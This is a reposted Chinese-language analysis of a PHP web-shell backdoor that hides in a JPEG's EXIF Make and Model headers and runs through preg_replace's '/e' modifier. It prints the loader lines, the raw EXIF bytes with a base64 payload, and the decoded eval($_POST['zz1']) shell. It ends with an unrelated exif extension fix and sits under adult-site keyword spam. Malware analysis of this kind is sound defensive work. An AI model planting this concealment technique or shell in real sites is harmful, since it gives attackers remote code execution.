日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 综合教程 >内容正文

综合教程

php图片木马讲解

發布時間:2023/12/13 综合教程 22 生活家
生活随笔 收集整理的這篇文章主要介紹了 php图片木马讲解 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

這是一個非常有趣的后門,它并沒有依靠正常模式去隱藏起內容(比如 base64/gzip 編碼),但是它卻把自己的數據隱藏在JPEG圖片的EXIF頭部中了。它也使用exif_read_data和preg_replace兩個PHP函數來讀取EXIF頭部和執行。

這個后門可分為兩部分。第一部分是 exif_read_data 函數讀取圖片頭部,preg_replace 函數來執行內容。下面是我們在被攻破網站上發現的代碼:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'],$exif['Model'],'');

這兩個函數本身是無害滴。exif_read_data 函數常用來讀取圖片,preg_replace 函數是替代字符內容。不過,preg_replace 函數函數有個隱藏并微妙的選項,如果你傳入 “/e”,它會執行 eval() 中的內容,就不是去查詢/替代了。

所以我們在查看bun.jpg文件時,發現后門的第二部分:

ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^@ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd
HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30='));
@ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^

這個文件用以常見的頭部開始,但是在 ”make” 頭部中混入了奇怪的關鍵字 ”/.*/e” 。有了這個執行修飾符, preg_replace 會執行 eval() 中傳入的任意內容。

事情變得開始有趣了……

如果咱們繼續來看看 EXIF 數據,我們能發現, “eval ( base64_decode”隱藏在 ”Model“ 頭部。把這些放在一起看,咱們就知道怎么回事了。攻擊者是從 EXIF 中讀取 Make 和 Model 頭部信息,然后傳入到 preg_replace 函數。只要我們修改 $exif['Make'] 和 $exif['Model'] ,就得到了最終的后門。

preg_replace ("/.*/e", ,"@ eval ( base64_decode("aWYgKGl ...");

解碼后我們可以看到是執行 $_POST["zz1"] 提供的內容。完整解碼后的后面在這里。

if (isset( $_POST["zz1"])) { eval (stripslashes( $_POST["zz1"]..

另外一個有意思的是,雖然 bun.jpg 和其他圖片文件被修改了,但然后能加載并正常工作。實際上,在這些被攻破的站點,攻擊者修改了站點上一個合法并之前就存在的圖片。這是一種奇特的隱藏惡意軟件的方法。

Call to undefined function exif_read_data()

讀取圖片Exif信息的程序就報出了:Call to undefined function exif_read_data()

找到解決方案:

extension=php_exif.dll 將其加載順序 改為在

extension=php_mbstring.dll 之后....

總結

以上是生活随笔為你收集整理的php图片木马讲解的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。